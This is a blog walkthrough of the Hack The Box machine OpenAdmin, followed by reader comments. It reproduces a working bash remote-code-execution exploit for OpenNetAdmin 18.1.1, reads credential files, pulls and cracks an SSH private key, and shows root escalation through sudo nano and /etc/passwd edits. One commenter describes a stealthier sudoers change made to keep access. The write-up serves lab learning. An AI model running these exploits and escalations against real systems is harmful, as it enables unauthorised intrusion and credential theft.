Hack the Box OpenAdmin Writeup –

Hello, welcome to our Hack the Box write up series. Today we are doing OpenAdmin (, is an easy Linux box.

HackTheBox’s first machine of 2020 seems to be a new year’s gift from HTB to gain some points and ranks all their users. This machine is very simple and straight-forward.

Let us start.

NMAP Port Scan

As usual, let us add the machine’s IP to etc/hosts as openadmin.htb for easier access. The next step is to run start the namp scan.

# root @ ns09 in ~/htb/openadmin [21:53:45] 
$ cat OpenAdmin_all_ports.nmap
# Nmap 7.80 scan initiated Sun Jan  5 23:03:08 2020 as: nmap -sC -sV -T5 -p- -oA OpenAdmin_all_ports openadmin.htb
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for openadmin.htb (
Host is up (0.15s latency).
Not shown: 65503 closed ports, 30 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  5 23:16:37 2020 -- 1 IP address (1 host up) scanned in 808.45 seconds
# root @ ns09 in ~/htb/openadmin [21:53:57] 

The namp scan result shows, SSH on port 22, TCP port 80 which normally runs an HTTP service are open. A quick visit to port 80 shows the Apache2 website’s default welcome page.

The box is not disclosed anything interesting so far apart from a webpage and SSH. We might need to find directories for better enumeration. To see directories we need to run Dirbiuster, Let us set Dirbuster’s medium wordlist and start the scan.

let the Dirbuster run in the background and let us start enumerating the subdirectories it showed in the initial results. I started to concentrate on two directories, ONA and Music. I opened the http://openadmin.htb/ona which took me a webpage. This is the OpenNetAdmin control panel. The OpenNetAdmin is an opensource IP Address Management (IPAM) system.

A warning on the homepage shows the version of the app is 18.1.1. A quick look at vulnerabilities of version 18.1.1 on Google, shows the current version is vulnerable to RCE (remote code execution). So, at this point, we understood that this box is a victim of recently discovered exploit.

The ExploitDB listed two exploits, a Metasploit module, and a bash script.

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux


while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

I just download the script to my OpenAdmin working directory and run the script. The script gave me a shell as www-data immediately.

Since the user www-data is a low privileged user, we will not be able to perform any major tasks. So, we need to escalate his privilege to the next big user.

First, we need to find the users in the box. let us use cat /etc/passwd to see if we can perform the cat command to list the users.

$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd
$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

So we found a number of users in this box, but I’m not sure which one I should start to above to get the privilege. let us start to enumerate the box searching for hints.

After a while, I found a PHP file called “database_settings.inc.php” inside the directory; /opt/ona/www/local/config/. The file has MySQL database credentials.

So far, we are not sure about which user we could use these credentials, so I listed the current local users of the box and I found jimmy and joanna.

$ cat /opt/ona/www/local/config/database_settings.inc.php
$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',

Privilege Escalation

As the SSH was running, I tried ssh the box as jimmy, luckily it worked.

# root @ ns09 in ~/htb/openadmin [20:32:08] 
$ ssh jimmy@openadmin.htb
jimmy@openadmin.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Wed Jan  8 17:33:45 UTC 2020
  System load:  0.38              Processes:             200
  Usage of /:   49.1% of 7.81GB   Users logged in:       2
  Memory usage: 34%               IP address for ens160:
  Swap usage:   0%
  => There is 1 zombie process.
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan  8 17:30:22 2020 from
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ cd home
-bash: cd: home: No such file or directory
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile

However, after a while, It has been realized this user doesn’t have a User flag, so let us proceed to enumerate more. The user’s www folder has a special folder called “internal” which contained,

jimmy@openadmin:~$ ls
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile
jimmy@openadmin:~$ cd /
jimmy@openadmin:/$ ls
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz
jimmy@openadmin:/$ cd var
jimmy@openadmin:/var$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www
jimmy@openadmin:/var$ cd www
jimmy@openadmin:/var/www$ ls
html  internal  ona
jimmy@openadmin:/var/www$ cd internal
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The file “main.php” is our key to get the private key from user Joanna and login as Joanna. To get the private key, we need to run a cURL command. Upon proceeding to run cURL as local, We are blocked by an error “404 Not Found” with running in the port 80. This made me realized that I need to find the port number which will give me access to the private key.

jimmy@openadmin:~$ curl
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<address>Apache/2.4.29 (Ubuntu) Server at Port 80</address>

To find open ports within the system, I run “netstat -tulpn” command. The netstat listed a few open and listening ports:

jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0*               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 *                           -                   

I proceed with one by one, the second port 52846 returned the private key of user Joanna.

jimmy@openadmin:/var/www/internal$ curl
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.
jimmy@openadmin:/var/www/internal$ curl
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The SSH key has a password phrase for login, I copied the key to my Kali machine and used John to crack the password using rockyou.txt. John cracked the password as “bloodninjas“. I immediately SSH the box- as Joanna and got the user.txt.

joanna@openadmin:~$ ls
joanna@openadmin:~$ cat user.txt

Getting Into the Root

There are two ways you can get the root access on this machine using the privileges of our user Joanna. The first one is very simple by opening the nano as root and reding the root.txt file. The second one is getting the shell as root by adding yourself as the root user by editing the etc/passwd file, and then switch the user as your own user name.

Procedure 1: getting the root flag from nano:

The sudo -l command revealed that the user Joanna is able to run bin/nano /opt/priv as root without password. When you see the user can run nano as root, it is the simplest thing to exploit. Just 3 commands and the box is yours.


joanna@openadmin:~$ sudo /bin/nano /opt/priv

Does the Sudo confirm if you really need to run the file as root? obviously say “yes”.

Now, that you have nano running as root. Press CTR+ R (Read File) root/root.txt

And CTR+O (Write file) to read the root.txt.

HackTheBox OpenAdmin Root.txt

Procedure 2: Adding yourself as a root user

Press CTRL+O to read the file etc/passwd

CTRL+O to read etc/passwd file

Now the nano displays the contents of etc/passwd file, create a user in your name and assign a password and save using CTRL+O (Write file). Then exit the nano, go back to the terminal.

Reading etc/passwd file
Adding youeself as Root user

That’s it. Thank you for reading.


Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

View all posts by Navin →
Notify of
Newest Most Voted
Inline Feedbacks
View all comments
1 year ago

when i connect to ssh say the password is wrong ! so how you get the connection 😀

1 year ago

when i connect to first time with user [jimmy] and password [n1nj4W4rri0R!] using my ssh on kali [ssh jimmy@ openadmin . htb ] it say permission denied , so i don’t know why that happen after i type the password even i rest the machine more than once !!

1 year ago


I just left you some respect on HTB. I appreciate you posting your methods. I try to find at least 2 or 3 write-ups to compare how I approached the problem compared to others. Interesting enough I always find something and learn something new. I just wanted to say thanks and BTW you can use nano to run commands. you can do a cntrl-r and then a control-x … this approach was helpful for me when taking down openadmin.



Aric Wilisch
Aric Wilisch
9 months ago

Was a good write up. I couldn’t get john to work but the rest was good. Only thing I did differently was instead of adding an account for me, I just modified /etc/sudoers to say

No additional users to raise suspicion, might preserve my presence in the system for a bit longer.

Sorry, that action is blocked.